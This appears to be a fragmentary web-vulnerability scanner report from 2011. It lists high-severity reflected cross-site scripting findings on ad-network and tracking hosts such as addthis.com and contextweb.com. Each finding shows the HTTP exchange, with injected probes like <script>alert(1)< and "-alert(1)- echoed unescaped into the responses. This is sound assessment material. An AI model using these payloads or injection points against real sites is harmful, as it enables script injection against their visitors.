HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 17 Sep 2011 16:52:49 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR Connection: keep-alive Content-Length: 564 var ftGUID_189583="13553 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:53:02 GMT Server: Jetty(6.1.22) Content-Length: 564 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061003 (MII-APC/2.1) var ftGUID_189583="13553 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:53:59 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store pragma: no-cache Content-Type: text/javascript Content-Length: 567 P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061002 (MII-APC/2.1) var ftGUID_189583="13551 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://studio-5 |
Path: | /hearst |
GET /hearst?Account Host: studio-5.financialcontent Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:17 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Sat, 17 Sep 2011 16:23:17 GMT X-Cache: MISS from squid1.sv1.financial X-Cache-Lookup: MISS from squid1.sv1.financial Via: 1.0 squid1.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 905 document.write('\n'); document.write(''); var head=document.getEle var script=document script.type="text script.src='http:/ head.appendChild(script); _qoptions={ qacct:"p-0cUI5xpPZj8YQ" }; var head=d ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://studio-5 |
Path: | /hearst |
GET /hearst?Account Host: studio-5.financialcontent Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:18 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Sat, 17 Sep 2011 16:23:18 GMT X-Cache: MISS from squid2.sv1.financial X-Cache-Lookup: MISS from squid2.sv1.financial Via: 1.0 squid2.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 837 var head=document.getEle var script=document script.type="text script.src='http:/ head.appendChild(script); _qoptions={ qacct:"p-0cUI5xpPZj8YQ" }; var head=document.getEle var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://studio-5 |
Path: | /hearst |
GET /hearst1465b'-alert(1)- Host: studio-5.financialcontent Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:22 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Sat, 17 Sep 2011 16:23:22 GMT X-Cache: MISS from squid1.sv1.financial X-Cache-Lookup: MISS from squid1.sv1.financial Via: 1.0 squid1.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 865 var head=document.getEle var script=document script.type="text script.src='http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://studio-5 |
Path: | /hearst |
GET /hearst?Account Host: studio-5.financialcontent Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:20 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Sat, 17 Sep 2011 16:23:20 GMT Expires: Sat, 17 Sep 2011 16:24:20 GMT X-Cache: MISS from squid2.sv1.financial X-Cache-Lookup: MISS from squid2.sv1.financial Via: 1.0 squid2.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 28444 document.write('\n'); document.write('<style>\n document.write('\/* Global CSS Styles *\/\n'); document.write('.fc * {\n'); document.write(' padding:0px; \n'); document.write(' border:0px; \n'); do ...[SNIP]... ancialcontent.com/track head.appendChild(script); _qoptions={ qacct:"p-0cUI5xpPZj8YQ" }; var head=document.getEle var script=doc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP205 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:09 GMT Content-Length: 8853 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:49 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb String.prototype return(this.toL ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP203 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:06:30 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:13 GMT Content-Length: 8881 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:53 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb String.prototype.c ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP210 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:17:03 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:21 GMT Content-Length: 8851 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:51:00 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb String.prototype return(this.toLowerCase() ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP205 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:15 GMT Content-Length: 8881 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:55 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP211 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:18:33 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:24 GMT Content-Length: 8852 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:51:04 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb String.prototype return(this.toLowerCase() }; var _nxy = [-1,-1]; var _cwd = document; var _cww = wi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP201 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:04:17 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 8853 Date: Sat, 17 Sep 2011 17:04:11 GMT Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:51 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb String.prototype return(this.toLowerCase() ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP200 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Thu, 15 Sep 02011 17:21:08 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:26 GMT Content-Length: 8881 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:51:06 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP205 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 17:04:18 GMT Content-Length: 8853 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:58 GMT; Path=/ function cw_Process() { try { var cu="http://tag.contextweb String.prototype return(this.toLowerCase() ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api46704"-alert(1)- Host: www.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 17:16:21 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api46704"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api284e1<script>alert(1)< Host: www.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 17:16:21 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api284e1<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/naia867c<script>alert(1)< Host: www.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 17:16:28 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api/naia867c<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai1dfed"-alert(1)- Host: www.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 17:16:28 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api/nai1dfed"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai/optoutc8bc2<script>alert(1)< Host: www.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 17:16:36 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai/optoutc8bc2<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai/optout3696e"-alert(1)- Host: www.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 17:16:36 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api/nai/optout3696e"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /apiebf92<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 16:44:24 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>apiebf92<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /apibd083"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 16:44:23 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/apibd083"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /api/naib8afa"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 16:44:28 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api/naib8afa"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /api/nai44304<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 16:44:29 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1411 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai44304<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /api/nai/status8130b"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 16:44:32 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api/nai/status8130b"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
